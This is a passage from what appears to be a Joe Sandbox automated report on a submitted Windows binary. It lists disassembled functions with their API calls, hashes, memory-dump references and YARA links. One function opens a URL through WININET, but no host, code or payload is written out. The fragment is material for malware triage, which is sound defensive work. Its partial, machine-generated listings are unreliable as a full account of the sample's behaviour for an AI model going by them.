                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 005F3DC5
                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 005F3DE7
                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 005F3EF6
                                                                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 005F3FC8
                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 005F404C
                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 005F4067
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 2123188842-393685449
                                                                                                                                                                                            • Opcode ID: 58ad7360eabc5ad2ac3c07b15c8c09769f38ab97a7eb713b4e317201fe7b063d
                                                                                                                                                                                            • Instruction ID: 464f99b92c551330e567d38eca35104fdc4f7fab4e087accfbd6f57e3368fc15
                                                                                                                                                                                            • Opcode Fuzzy Hash: 58ad7360eabc5ad2ac3c07b15c8c09769f38ab97a7eb713b4e317201fe7b063d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 10B1687180020EAFDF28DFA4C8859BEBFB9BF44310B14455AEA05AB212D779DA51CF91
                                                                                                                                                                                            Function 005D56B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146networkfileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005D56F1
                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000100,00000000), ref: 005D575B
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 005D5768
                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005D57C9
                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005D57FB
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 005D580C
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 005D580F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Internet$CloseHandle$FileOpenRead
                                                                                                                                                                                            • String ID: Couldn't open Internet!$Couldn't open URL!
                                                                                                                                                                                            • API String ID: 3539267403-1021515825
                                                                                                                                                                                            • Opcode ID: 1c814ec05a765f173e566c12441a3fdc821e287f2bea4107e7fa8c890ea6ee02
                                                                                                                                                                                            • Instruction ID: 2c483ea425b69a1bf88a75ed0e1507750b7af6d9c336398742c1a85a897bad71
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c814ec05a765f173e566c12441a3fdc821e287f2bea4107e7fa8c890ea6ee02
                                                                                                                                                                                            • Instruction Fuzzy Hash: E9519471A10209ABDB149FA8CC49BAFBB79FF44305F20451AF900B6381E7759A44CBA0
                                                                                                                                                                                            Function 005FC978 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _free.LIBCMT ref: 005FC98E
                                                                                                                                                                                              • Part of subcall function 005FCE37: HeapFree.KERNEL32(00000000,00000000,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?), ref: 005FCE4D
                                                                                                                                                                                              • Part of subcall function 005FCE37: GetLastError.KERNEL32(?,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?,?), ref: 005FCE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 005FC99A
                                                                                                                                                                                            • _free.LIBCMT ref: 005FC9A5
                                                                                                                                                                                            • _free.LIBCMT ref: 005FC9B0
                                                                                                                                                                                            • _free.LIBCMT ref: 005FC9BB
                                                                                                                                                                                            • _free.LIBCMT ref: 005FC9C6
                                                                                                                                                                                            • _free.LIBCMT ref: 005FC9D1
                                                                                                                                                                                            • _free.LIBCMT ref: 005FC9DC
                                                                                                                                                                                            • _free.LIBCMT ref: 005FC9E7
                                                                                                                                                                                            • _free.LIBCMT ref: 005FC9F5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: 3d4e82929c39b13c76fa35f0a48b96c8307167210cc6be5679283eedf6e766ef
                                                                                                                                                                                            • Instruction ID: 772e3407770ac51c995529b2fa013966e9c3538a02ad3fef669d7d39e7a5e175
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d4e82929c39b13c76fa35f0a48b96c8307167210cc6be5679283eedf6e766ef
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7821D67690010DAFCB02EF94CA85CEE7FB9BF48340F4081A6B7059B521DB35EA55CB80
                                                                                                                                                                                            Function 005DC4C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 005DC4D7
                                                                                                                                                                                              • Part of subcall function 005EF760: std::_Lockit::_Lockit.LIBCPMT ref: 005EF772
                                                                                                                                                                                              • Part of subcall function 005EF760: std::locale::_Setgloballocale.LIBCPMT ref: 005EF78D
                                                                                                                                                                                              • Part of subcall function 005EF760: _Yarn.LIBCPMT ref: 005EF7A3
                                                                                                                                                                                              • Part of subcall function 005EF760: std::_Lockit::~_Lockit.LIBCPMT ref: 005EF7E3
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005DC4EC
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005DC507
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005DC527
                                                                                                                                                                                            • __Getcoll.LIBCPMT ref: 005DC5AA
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 005DC5DC
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005DC5F4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Facet_GetcollInitRegisterSetgloballocaleYarn
                                                                                                                                                                                            • String ID: ios_base::badbit set
                                                                                                                                                                                            • API String ID: 1067193257-3882152299
                                                                                                                                                                                            • Opcode ID: e11b113ad60a65d71a4cb6d5e6ed451ad797ecb24a626599b89aff4f23eee695
                                                                                                                                                                                            • Instruction ID: be0aa30ec18d0daf9538370c6206ccf1fa2b4fb05e50b13847700ee412afd1f9
                                                                                                                                                                                            • Opcode Fuzzy Hash: e11b113ad60a65d71a4cb6d5e6ed451ad797ecb24a626599b89aff4f23eee695
                                                                                                                                                                                            • Instruction Fuzzy Hash: AA41B0719016169FDB34DF68E8449AEBFB5BF80310B15816BE8466B352DB31FA01CB80
                                                                                                                                                                                            Function 005F3760 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 120COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 005F3797
                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 005F379F
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 005F3828
                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 005F3853
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 005F38A8
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                            • String ID: @0]$O&_$csm
                                                                                                                                                                                            • API String ID: 1170836740-2804530593
                                                                                                                                                                                            • Opcode ID: 6a705ab401249287b8739e95d017c6c6436c00a150b446a0d6ab118ab42bb71b
                                                                                                                                                                                            • Instruction ID: 31c15777ac586f5161b2bdadf79e83594e61dd3a23e64fa8e70859f6850bed93
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a705ab401249287b8739e95d017c6c6436c00a150b446a0d6ab118ab42bb71b
                                                                                                                                                                                            • Instruction Fuzzy Hash: FD41E174A0120D9BDF10DF68C884AAEBFA5FF44354F148595F918AB392C779EB41CB90
                                                                                                                                                                                            Function 005D1B80 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005D1B92
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005D1BAD
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005D1BCD
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005D1C1E
                                                                                                                                                                                            • __Getctype.LIBCPMT ref: 005D1C6D
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 005D1C93
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005D1CAB
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeRegister
                                                                                                                                                                                            • String ID: d`
                                                                                                                                                                                            • API String ID: 2525760861-4132929406
                                                                                                                                                                                            • Opcode ID: c2935f2d3267341dd03542cb9329870afc293749da91f22ef772b70df20aec35
                                                                                                                                                                                            • Instruction ID: 2cafabf48987faa42869be6c2705ac546b95d16b98ae7bfc31a5c68a24521da5
                                                                                                                                                                                            • Opcode Fuzzy Hash: c2935f2d3267341dd03542cb9329870afc293749da91f22ef772b70df20aec35
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441D771A40A15AFD734DF5CD8849A9BBB5FF50310B1481ABE8899B322EB31ED41C7C5
                                                                                                                                                                                            Function 005FF84E Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 16f84fc7c648c6b84828cb56d1747476c6686fd7119e42a44e4bf3386eb1edd8
                                                                                                                                                                                            • Instruction ID: d1201e64c0b6e0f2180df848b339f41e8db31370d05984c028c97b65a9b6e0a4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 16f84fc7c648c6b84828cb56d1747476c6686fd7119e42a44e4bf3386eb1edd8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 65C10270E0420EAFDB25DF98D994BBE7FB1BF49300F144169EB04AB692C7789901CB60
                                                                                                                                                                                            Function 006061F1 Relevance: 13.7, APIs: 9, Instructions: 199COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                            • Opcode ID: d551e36c26060e5d1f5bce36b51f2292d64424321368591d52a6783737d3da62
                                                                                                                                                                                            • Instruction ID: c231611c0f46e0ee586d8c7f627d57a4e4490da64aa2f84589d5a11850cda8f7
                                                                                                                                                                                            • Opcode Fuzzy Hash: d551e36c26060e5d1f5bce36b51f2292d64424321368591d52a6783737d3da62
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1061D372980305AFDB28DF64C941BABBBEAEF44310F145529FA55AB2C1E770AD118B90
                                                                                                                                                                                            Function 005FB0B9 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 255COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                            • _free.LIBCMT ref: 005FB3A4
                                                                                                                                                                                            • _free.LIBCMT ref: 005FB3BD
                                                                                                                                                                                            • _free.LIBCMT ref: 005FB3FB
                                                                                                                                                                                            • _free.LIBCMT ref: 005FB404
                                                                                                                                                                                            • _free.LIBCMT ref: 005FB410
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorLast
                                                                                                                                                                                            • String ID: @0]$C
                                                                                                                                                                                            • API String ID: 3291180501-346233754
                                                                                                                                                                                            • Opcode ID: 43bd0a96790ddb44d9ba92b1a215c178132ed0d331390e56cd96d47825b50dea
                                                                                                                                                                                            • Instruction ID: b572b32d4ce01ce3fdcc854a85a09762246ff5bf286dfaa7a6ddcdee01363974
                                                                                                                                                                                            • Opcode Fuzzy Hash: 43bd0a96790ddb44d9ba92b1a215c178132ed0d331390e56cd96d47825b50dea
                                                                                                                                                                                            • Instruction Fuzzy Hash: 89B15D7590121ADFEB24DF18C888BADBBB5FF48304F5445A9EA49A7391D734AE90CF40
                                                                                                                                                                                            Function 005FAC2E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0060097D: HeapAlloc.KERNEL32(00000000,?,?,?,005F18D8,?,?,?,?,?,005D11E3,?,?), ref: 006009AF
                                                                                                                                                                                            • _free.LIBCMT ref: 005FAD3D
                                                                                                                                                                                            • _free.LIBCMT ref: 005FAD54
                                                                                                                                                                                            • _free.LIBCMT ref: 005FAD71
                                                                                                                                                                                            • _free.LIBCMT ref: 005FAD8C
                                                                                                                                                                                            • _free.LIBCMT ref: 005FADA3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$AllocHeap
                                                                                                                                                                                            • String ID: \2a$x2a
                                                                                                                                                                                            • API String ID: 1835388192-915316952
                                                                                                                                                                                            • Opcode ID: a258a402f05fe14e179f8f76b7b8196d86ebe745330d9e8eecc9aa34fd8080ec
                                                                                                                                                                                            • Instruction ID: f65ca1ff85ac71ae7d6b7863874d450cedfc9c483de40633606fd1c6ed7c3316
                                                                                                                                                                                            • Opcode Fuzzy Hash: a258a402f05fe14e179f8f76b7b8196d86ebe745330d9e8eecc9aa34fd8080ec
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4451B371A003099FDB219F69D841ABA7BF9FF48711F144569EA0ADB250E739EE008B42
                                                                                                                                                                                            Function 005D1A50 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005D1A62
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005D1A7D
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005D1A9D
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005D1AEE
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 005D1B50
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005D1B68
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
                                                                                                                                                                                            • String ID: d`
                                                                                                                                                                                            • API String ID: 1858714459-4132929406
                                                                                                                                                                                            • Opcode ID: 63881efeba4f8ed52c7b58b72b3e6f151f68e2b0d9f3c1c46ccde9e88a79c6c4
                                                                                                                                                                                            • Instruction ID: 1f2112163e922dba496ac31a76425976a397e6d3a76bcd748f5d709ecb666b44
                                                                                                                                                                                            • Opcode Fuzzy Hash: 63881efeba4f8ed52c7b58b72b3e6f151f68e2b0d9f3c1c46ccde9e88a79c6c4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F31F631A01615AFD734DF5CD884999BBA1FF50350B2481ABD8899B312EB31EE42CBC4
                                                                                                                                                                                            Function 00605522 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                                                                            • Opcode ID: a30ce604f6dd5be4373aeb08a6c7f3a9c63af5ee412410669a7ca487bfb8918c
                                                                                                                                                                                            • Instruction ID: 5e2ae3d30ebaa0d554564a2e3e18454af1429a55583183d2bd2b0a341555b236
                                                                                                                                                                                            • Opcode Fuzzy Hash: a30ce604f6dd5be4373aeb08a6c7f3a9c63af5ee412410669a7ca487bfb8918c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 025129B0984B49AFDB29AF648C45ABF7FABEF01310F00456DE652972C2EB758941CF50
                                                                                                                                                                                            Function 005D40F0 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 311COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                            • String ID: ,`$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 2638373210-833346958
                                                                                                                                                                                            • Opcode ID: 05610ee7647f9865b99e4c2b42a61571c0344147d0ea90418006fa2aff11fe3b
                                                                                                                                                                                            • Instruction ID: 09be4c00884360730d23eae60ba908ceef4ad5fab254e4902ae0da6e0ca6c700
                                                                                                                                                                                            • Opcode Fuzzy Hash: 05610ee7647f9865b99e4c2b42a61571c0344147d0ea90418006fa2aff11fe3b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CA18B36A001099FCB28CF6CC884AAEBBA6FF94320F14856BED19CB355D631DD50CB90
                                                                                                                                                                                            Function 00604B2A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
